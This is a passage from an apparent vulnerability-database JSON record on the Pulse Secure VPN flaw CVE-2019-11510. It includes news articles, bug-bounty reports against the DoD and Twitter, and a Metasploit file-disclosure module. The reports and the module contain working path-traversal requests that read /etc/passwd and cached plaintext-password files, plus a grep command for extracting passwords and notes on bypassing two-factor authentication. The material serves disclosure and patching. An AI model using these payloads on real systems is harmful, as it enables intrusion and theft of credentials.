specified log entries to look for signs of a compromise or attempt to compromise. They also emphasize the need for patching: \n\n> \u201cSecurity patches should always be applied promptly. More guidance is available on the NCSC website. The NCSC acknowledges that patching is not always straightforward and in some cases can cause business disruption, but it remains the single most important step an organisation or individual can take to protect itself.\u201d\n\nSo, the question remains: If organizations are aware of the patch and have the staff resources to apply it, why are so many dragging their feet? Maybe some of our readers can shed some light on this mystery. Feel free to share your personal experiences in the comments. \n\nThe post [Pulse VPN patched their vulnerability, but businesses are trailing behind](<https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2019-10-18T16:36:36", "published": "2019-10-18T16:36:36", "id": "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "href": "https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/", "type": "malwarebytes", "title": "Pulse VPN patched their vulnerability, but businesses are trailing behind", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2019-12-02T20:29:48", "bulletinFamily": "bugbounty", "bounty": 0.0, "description": "**Summary:**\nPulse Secure has two main vulnerabilities that allow file disclosure and post auth RCE\n**Description:**\nCVE-2019-11510 is a file disclosure due to some normalization issues in pulse secure. I was able to reproduce this by grabbing in the etc/passswd. \nhttps://$hax/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/#\n\nThough the impact of that is very limited, medium to high sec at best. From here we can grab a specific file.\n\nThe file /data/runtime/mtmp/lmdb/dataa/data.mdb contains clear context passwords and usernames, when a user logs in from here we can then access the Pulse secure instance. I stopped here due to not wanting to break the rules of engagements but from here I would log in then exploit a Post auth exploit.\n\n\nHere's a list of files that an attacker would instantly hit\n/data/runtime/mtmp/system\n/data/runtime/mtmp/lmdb/dataa/data.mdb\n/data/runtime/mtmp/lmdb/dataa/lock.mdb\n/data/runtime/mtmp/lmdb/randomVal/data.mdb\n/data/runtime/mtmp/lmdb/randomVal/lock.mdb\n## Impact\nCritical \n## Step-by-step Reproduction Instructions\nWe can only do this using due to browsers messing up the exploit\n\ncurl --path-as-is -k -D- https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/#\n\n curl --path-as-is -k -D- https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/#\n\n curl --path-as-is -k -D- https://\u2588\u2588\u2588/dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/#\n\n## Product, Version, and Configuration (If applicable)\nPulse Secure\n## Suggested Mitigation/Remediation Actions\nPatch pulse immediately\n\n## Impact\n\nAn attacker will be able to download internal files and specifically target a local file which stores clear text passwords when a user login. This also an attacker to access highly sensitive internal areas and even can perform command execution", "modified": "2019-12-02T19:29:23", "published": "2019-08-12T14:34:14", "id": "H1:671749", "href": "https://hackerone.com/reports/671749", "type": "hackerone", "title": "U.S. Dept Of Defense: Pulse Secure File disclosure, clear text and potential RCE", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-02T21:26:28", "bulletinFamily": "bugbounty", "bounty": 0.0, "description": "**Summary / Description:**\n\u2588\u2588\u2588\u2588\u2588 is vulnerable to Path Traversal which can lead to remote code execution.\n\n\n\n\n## Impact\nCritical\n\n## Step-by-step Reproduction Instructions\n\n1. Run the following `cURL` command to get the file `/etc/hosts`\n\n```\ncurl --path-as-is -k -D- 'https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/dana-na/../dana/html5acc/guacamole/../../../../../../etc/hosts?/dana/html5acc/guacamole/#'\n```\n\n\n```\n## File generated by DSNet::Hosts::update at Thu Aug 1 13:24:40 2019\n\n127.0.0.1\tlocalhost\n\u2588\u2588\u2588\u2588\u2588128.141\tKMPC1_Node4\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588252.82\tacrcxznxx07d-10\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588252.74\tacrcxznxx06d-10\u2588\u2588\u2588\n\u2588\u2588\u2588252.67\tODA-SCAN\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588252.65\tODA-VIP-1\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588252.63\tODA-1\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588252.196\tsubversion\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588252.134\tacrcxznxx07d-12\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588252.13\tODA-2\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588251.16\tacdeva0xxb5l010\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588251.15\tacdeva0xxb5l009\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588251.14\tacdeva0xxb5l008\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588250.239\tdevikrome\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588250.216\tws.soa\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588250.192\tac0hxzndb01d-07.rsn.aac\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588250.16\tdevccimm\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588250.112\tdevauth\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588l devauth\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588250.104\tac0hxznap02d-03\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u25881.235\tspex\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u25881.205\tauth\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u25881.164\tinternal\u2588\u2588\u2588\u2588 internal\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u25881.142\tensq\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 ensq\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u25880.92\tac0hqa0xxa3b021.rsn.aac\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u25880.55\tg2g\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u25880.177\tAc0hqa0xxa1b005.rsn.aac\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u258864.181\tac0hqsmap13p\n\u2588\u2588\u2588\u258864.142\tac0hqsmxx03p\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u258840.237\temmggb\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u258840.126\tac0hqapxx25p.rsn.aac\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588221.42\tgcrcknox gcrcknox\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588220.81\tft1ariss\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588220.245\tccimm\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588220.150\tensqrtn\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588220.145\tpthensqtrain\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588212.9\tacrcea0xxb5l035\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588212.64\tacrcea0xxb5l034\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u258818.60\tquestcentral questcentral\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588163.35\thrcremedy\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u258878.107\tafrissimt.rs\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u25888.61\tnetscout\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588205.203\tac0hqa0xxb5l007\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588205.202\tac0hqa0xxb5l006\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588205.200\tacrtna0xxb5l003\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588146.8\tAC0HQC2A0A3B021.RSN.AAC\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588146.7\tAC0HQC2A0A3B020.rsn.aac\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588145.91\tac0hqwsxx04p.rsn.aac\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588145.149\tcaliber11.rsn.aac\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588145.118\tac0hqwsap06p.rsn.aac\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588144.95\tikrome\u2588\u2588\u2588\u2588 ft1ikrome\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588144.91\tAuth\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588144.216\tac0hqc2a0a3b010.rsn.aac\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588197.16\tacft1a0xxb5l005\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588197.15\tacft1a0xxb5l004\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588196.62\tft1ccimm\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588196.28\tft1auth\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588195.247\tac0hldbxx02t\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588195.246\tac0hldbxx01t\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588195.195\tac0hxzndb04t-01\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588195.188\tac0hxznap04t-03\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588195.158\tac0hxznxx24t-02\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588195.133\tft1internal\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588195.127\tac0hxznap03t-03\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588194.78\tws13t.soa\u2588\u2588\u2588\u2588\u2588 ws14t.soa\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588194.165\tft1ensq\u2588\u2588\u2588 ac0hxznxx03t-08-ensq_wls1\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588194.119\trmdwebtopft1\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n```\n\n\nWe can grab any other file on this system:\n\n```\n/data/runtime/mtmp/system\n/data/runtime/mtmp/lmdb/dataa/data.mdb\n/data/runtime/mtmp/lmdb/dataa/lock.mdb\n/data/runtime/mtmp/lmdb/randomVal/data.mdb\n/data/runtime/mtmp/lmdb/randomVal/lock.mdb\n```\n\nThe VPN user and hashed passwords are stored in the `mtmp/system` file, but when users log into the application, it caches the plain-text password into `dataa/data.mdb`. \n\n```\ngrep 'password@9' data.mdb -a\n```\n\nwill get you a load of plain-text passwords\n\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n## Product, Version, and Configuration (If applicable)\nhttps://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101\n\n## Suggested Mitigation/Remediation Actions\nUpdate the Pulse Connect Secure VPN\n\n## Impact\n\nCritical, an attacker can get code execution with this vulnerability.\n\n## References:\nhttps://hackerone.com/reports/591295\n\nThanks,\nCorben (@cdl)", "modified": "2019-12-02T19:46:35", "published": "2019-08-12T18:42:25", "id": "H1:671857", "href": "https://hackerone.com/reports/671857", "type": "hackerone", "title": "U.S. Dept Of Defense: [CVE-2019-11510 ] Path Traversal on \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 leads to leaked passwords, RCE, etc", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-02T21:26:28", "bulletinFamily": "bugbounty", "bounty": 0.0, "description": "##Description\nHello. Some time ago, researcher Orange Tsai from DEVCORE team had a talk on Defcon/BlackHat regarding Pulse Secure SSL VPN vulnerabilities fixed on 2019/4/25:\n**CVE-2019-11510 - Pre-auth Arbitrary File Reading**\nCVE-2019-11542 - Post-auth Stack Buffer Overflow\n**CVE-2019-11539 - Post-auth Command Injection**\nCVE-2019-11538 - Post-auth Arbitrary File Reading\n**CVE-2019-11508 - Post-auth Arbitrary File Writing**\nCVE-2019-11540 - Post-auth Session Hijacking\n\nLink to the slides: https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf\n\nI discovered that https://\u2588\u2588\u2588\u2588 instance is vulnerable to described vulnerabilities.\n\n##POC\nExtracting `/etc/passwd` as example:\n```\ncurl -i -k --path-as-is https://\u2588\u2588\u2588\u2588\u2588\u2588/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/\n```\n{F561180}\n\nThe RCE can be achieved with this chain:\n1) Pulse Secure stores credentials in the cleartext.\n2) Attacker reads credentials via CVE-2019-11510 (it stored in the `/data/runtime/mtmp/lmdb/dataa/data.mdb`) and authorizes on VPN\n3) Attacker exploits CVE-2019-11539 - Post-auth Command Injection achieving RCE as root.\n\n##Suggested fix\nUpdate the Pulse Secure SSL VPN software (also implementing certificate validation can harden access a bit if some similar CVEs will be discovered in future).\n\n## Impact\n\nRemote code execution as root (by reading plaintext credentials and then exploiting CVE-2019-11539 - Post-auth Command Injection) and accessing intranet behind VPN.", "modified": "2019-12-02T19:59:54", "published": "2019-08-21T13:03:00", "id": "H1:678496", "href": "https://hackerone.com/reports/678496", "type": "hackerone", "title": "U.S. Dept Of Defense: Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://\u2588\u2588\u2588", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-10T15:53:38", "bulletinFamily": "bugbounty", "bounty": 20160.0, "description": "Hi, we(Orange Tsai and Meh Chang) are the security research team from DEVCORE. Recently, we are doing a research about SSL VPN security, and found several critical vulnerabilities on Pulse Secure SSL VPN! We have reported to vendor and [patches](https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101) have been released on `2019/4/25`. Since that, we keep monitoring numerous large corporations using Pulse Secure and we noticed that Twitter haven't patched the SSL VPN server over one month!\n\nThese vulnerabilities include a pre-auth file reading(CVSS 10) and a post-auth(admin) command injection(CVSS 8.0) which can be chained into a pre-auth RCE! Here are all vulnerabilities we found:\n\n* CVE-2019-11510 - Pre-auth Arbitrary File Reading\n* CVE-2019-11542 - Post-auth Stack Buffer Overflow\n* CVE-2019-11539 - Post-auth Command Injection\n* CVE-2019-11538 - Post-auth Arbitrary File Reading\n* CVE-2019-11508 - Post-auth Arbitrary File Writing\n* CVE-2019-11540 - Post-auth Session Hijacking\n\n\n## Our Steps\n\nFirst, we download following files with CVE-2019-11510:\n1. `/etc/passwd`\n2. `/etc/hosts`\n3. `/data/runtime/mtmp/system`\n4. `/data/runtime/mtmp/lmdb/dataa/data.mdb`\n5. `/data/runtime/mtmp/lmdb/dataa/lock.mdb`\n6. `/data/runtime/mtmp/lmdb/randomVal/data.mdb`\n7. `/data/runtime/mtmp/lmdb/randomVal/lock.mdb`\n\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n\nThe VPN user and hashed passwords are stored in the file `mtmp/system`. However, Pulse Secure caches the plain-text password in the `dataa/data.mdb` once the user log-in. Here, we just grep part of username/plain-text-password for proofs and further actions.\n\n*P.S. we mask the password field for security concerns, and we can send to you if you provide your PGP key.*\n\n```\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 / \u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 / \u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588 / \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 / \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588 / \u2588\u2588\u2588\u2588\u2588\u2588\n```\n\nOnce we log into the SSL VPN, we found the server has enabled the Two-Factor Authentication. Here, we listed two methods to bypass the 2FA:\n\n\u2588\u2588\u2588\u2588\n\n1. We observed Twitter using the 2FA solution from Duo.com. With the file `mtmp/system`, we could obtain the integration key, secret key, and API hostname, which should be protected carefully according to the [Duo documentation](https://duo.com/docs/pulseconnect):\n\n > Treat your secret key like a password\n The security of your Duo application is tied to the security of your secret key (skey). Secure it as you would any sensitive credential. Don't share it with unauthorized individuals or email it to anyone under any circumstances!\n\n ```\n # secret-key = \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n \u2588\u2588\u2588\u2588\n dc=\u2588\u2588\u2588,dc=duosecurity,dc=com\n cn=<USER>\n\n # LDAP password = \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n \u2588\u2588\u2588\u2588\u2588\n \u2588\u2588\u2588\u2588\u2588\u2588\u2588\n uid=<username>\n ```\n\n2. The Pulse Secure stores the user session in the `randomVal/data.mdb`. Without `Roaming Session` option enabled, we can reuse the session and log into your SSL VPN!\n\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n\n\nThe next, in order to trigger the command injection(CVE-2019-11542). We leverage the web proxy function to access the admin interface with following URL:\n\n```\nhttps://0/admin/\n```\n\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\nWe are now trying to crack the admin hash by GPU. It seems takes a long time, but once we cracked, we can achieve RCE absolutely. Actually, we can simply wait for the admin login and obtain the plain-text password directly!\n```\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n```\n\nAnyway, we decided to report to you first, because it's lethal and critical. If you want, we can provide the RCE PoC in admin interface in order to proof the potential risk!\n\n\n## Impact:\n\n1. Access Intranet(we have accessed the `\u2588\u2588\u2588\u2588\u2588\u2588\u2588` for proof) \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n2. Plenty of staff plain-text passwords\n3. Internal server and passwords(such as the LDAP)\n4. Attack back all VPN clients(we will detail the step in [Black Hat USA 2019](https://www.blackhat.com/us-19/briefings/schedule/#infiltrating-corporate-intranet-like-nsa---pre-auth-rce-on-leading-ssl-vpns-15545))\n5. Private keys\n6. Sensitive cookies in Web VPN(such as okta, salesforce, box.com and google)\n\n## Supporting Material/References:\n\nWe attached screenshots to proof our actions. For security concern, we didn't attach the `mtmp/system` and the `dataa/data.mdb`. If you want, we can send to you with your PGP key encrypted!\n\n## Recommend Solution\n\nThe only and simplest way to solve this problem is to upgrade your SSL VPN to the [latest version](https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101)!\n\n## Impact\n\n1. Access Intranet(we have accessed the `\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588` for proof) \u2588\u2588\u2588\u2588\n2. Plenty of staff plain-text passwords\n3. Internal server and passwords(such as the LDAP)\n4. Attack back all VPN clients(we will detail the step in [Black Hat USA 2019](https://www.blackhat.com/us-19/briefings/schedule/#infiltrating-corporate-intranet-like-nsa---pre-auth-rce-on-leading-ssl-vpns-15545))\n5. Private keys\n6. Sensitive cookies in Web VPN(such as okta, salesforce, box.com and google)", "modified": "2019-08-10T15:06:45", "published": "2019-05-28T07:53:44", "id": "H1:591295", "href": "https://hackerone.com/reports/591295", "type": "hackerone", "title": "Twitter: Potential pre-auth RCE on Twitter VPN", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2019-08-22T05:38:44", "bulletinFamily": "exploit", "description": "", "modified": "2019-08-21T00:00:00", "published": "2019-08-21T00:00:00", "id": "PACKETSTORM:154176", "href": "https://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html", "title": "Pulse Secure SSL VPN 8.1R15.1 / 8.2 / 8.3 / 9.0 Arbitrary File Disclosure", "type": "packetstorm", "sourceData": "`# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit) \n# Google Dork: inurl:/dana-na/ filetype:cgi \n# Date: 8/20/2019 \n# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera \n# Vendor Homepage: https://pulsesecure.net \n# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n# Tested on: Linux \n# CVE : CVE-2019-11510 \nrequire 'msf/core' \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Post::File \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Pulse Secure - System file leak', \n'Description' => %q{ \nPulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. \nThis exploit reads /etc/passwd as a proof of concept \nThis vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n}, \n'References' => \n[ \n[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ] \n], \n'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ], \n'License' => MSF_LICENSE, \n'DefaultOptions' => \n{ \n'RPORT' => 443, \n'SSL' => true \n}, \n)) \n \nend \n \n \ndef run() \nprint_good(\"Checking target...\") \nres = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342) \n \nif res && res.code == 200 \nprint_good(\"Target is Vulnerable!\") \ndata = res.body \ncurrent_host = datastore['RHOST'] \nfilename = \"msf_sslwebsession_\"+current_host+\".bin\" \nFile.delete(filename) if File.exist?(filename) \nfile_local_write(filename, data) \nprint_good(\"Parsing file.......\") \nparse() \nelse \nif(res && res.code == 404) \nprint_error(\"Target not Vulnerable\") \nelse \nprint_error(\"Ooof, try again...\") \nend \nend \nend \ndef parse() \ncurrent_host = datastore['RHOST'] \n \nfileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\") \nwords = 0 \nwhile (line = fileObj.gets) \nprintable_data = line.gsub(/[^[:print:]]/, '.') \narray_data = printable_data.scan(/.{1,60}/m) \nfor ar in array_data \nif ar != \"............................................................\" \nprint_good(ar) \nend \nend \n#print_good(printable_data) \n \nend \nfileObj.close \nend \nend \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/154176/pulsesecure-disclose.rb.txt"}], "threatpost": [{"lastseen": "2020-01-10T11:22:37", "bulletinFamily": "info", "description": "The Sodinokibi ransomware strain is apparently behind the New Year\u2019s Eve attack on foreign currency-exchange giant Travelex, which has left its customers and banking partners stranded without its services.\n\nThe criminals behind the attack are demanding a six-figure sum in return for the decryption key, according to reports, and are directing the company to a payment website hosted in Colorado.\n\n\u201cIt is just business. We absolutely do not care about you or your details, except getting benefits. If we do not do our work and liabilities \u2013 nobody will not co-operate with us. It is not in our interests,\u201d the [readme file](<https://www.computerweekly.com/news/252476283/Cyber-gangsters-demand-payment-from-Travelex-after-Sodinokibi-attack>) for the ransomware, obtained by Computer Weekly, said. \u201cIf you do not cooperate with our service \u2013 for us it does not matter. But you will lose your time and your data, cause just we have the private key. In practice time is much more valuable than money.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nSodinokibi, also known as REvil, appeared in April 2019. It has been responsible for a string of high-profile hits, including attacks on [22 Texas municipalities](<https://threatpost.com/the-texas-ransomware-attacks-a-gamechanger-for-cybercriminals/147597/>) and [various dentist offices](<https://threatpost.com/news-wrap-dentist-offices-hit-by-ransomware-venmo-faces-privacy-firestorm/147856/>) around the country. Researchers from Secureworks Counter Threat Unit (CTU) believe that the group behind the infamous GandCrab ransomware, which earlier this year [claimed to have retired](<https://threatpost.com/gandcrab-ransomware-shutters/145267/>), is actually [responsible for Sodinokibi](<https://threatpost.com/gandcrab-operators-resurface-revile-malware/148631/>), given that the string decoding functions and other code aspects employed by Sodinokibi and GandCrab are nearly identical.\n\nTravelex, a ubiquitous fixture at airports, provides foreign-exchange services in 70 countries across more than 1,200 retail branches. The attack resulted in Travelex websites in at least 20 countries going offline, left its retail locations to carry out tasks manually, and many customers remain stranded without travel money. Its global banking partners, including Barclays, First Direct, HSBC, Sainsbury\u2019s Bank, Tesco and Virgin Money, have also been left adrift with no way to buy or sell foreign currency.\n\nIt\u2019s unclear whether the company plans to pay the ransom, and it has offered no timeline on cleanup. While the company has [admitted the attack](<https://threatpost.com/travelex-knocked-offline-malware-attack/151522/>), many of its websites merely are showing a [warning screen](<https://www.travelex.com/news-room>) saying that they\u2019re down for \u201cplanned maintenance.\u201d\n\nIt has not returned Threatpost\u2019s requests for comment.\n\n## Unpatched Pulse Secure Servers\n\nThe attack could have been successful in part because Travelex took several months to patch critical vulnerabilities in its Pulse Secure VPN servers, according to Bad Packets.\n\nPulse Secure offers a popular enterprise remote access family of products. The company issued an urgent patch for two critical vulnerabilities in its Zero Trust VPN product in April. CVE-2019-11510 is an arbitrary file reading vulnerability allows sensitive information disclosure enabling unauthenticated attackers to access private keys and user passwords, according to the advisory; further exploitation using the leaked credentials can lead to remote command injection (CVE-2019-11539) and allow attackers to gain access inside private VPN networks.\n\n\u201cThat vulnerability is incredibly bad \u2014 it allows people without valid usernames and passwords to remotely connect to the corporate network the device is supposed to protect, turn off multi-factor authentication controls, remotely view logs and cached passwords in plain text (including Active Directory account passwords),\u201d explained researcher Kevin Beaumont (a.k.a. Gossi the Dog), [in a posting](<https://doublepulsar.com/big-game-ransomware-being-delivered-to-organisations-via-pulse-secure-vpn-bd01b791aad9>) this week.\n\nHe said that in August, he became aware that public exploits had been made available and that cybercriminals including APTs were actively scanning the internet for the issue (using public tools like the Shodan search engine). A corresponding [report from Bad Packets](<https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/>) that month indicated that major cyberattacks could be imminent.\n\n\u201cOn August 25th 2019, Bad Packets scanned the internet and [found almost 15,000 endpoints](<https://twitter.com/bad_packets/status/1165574263975186433>) across the world had the issue directly exploitable,\u201d Beaumont noted. \u201cThose results included networks at governments across the world \u2014 many incredibly sensitive organizations included \u2014 and basically a list of the world\u2019s largest companies. It was clear organizations were simply [not patching](<https://twitter.com/GossiTheDog/status/1213532072201084929>).\u201d\n\nOne of these organizations was Travelex, which had seven unsecured Pulse Secure servers, according to Bad Packets; it also said that the company waited until November \u2013 eight months after the vulnerability disclosure \u2013 to patch the issues.\n\n> We notified Travelex about their vulnerable Pulse Secure VPN servers on September 13, 2019.\n> \n> No response. [pic.twitter.com/lCjk7IY3OM](<https://t.co/lCjk7IY3OM>)\n> \n> \u2014 Bad Packets Report (@bad_packets) [January 4, 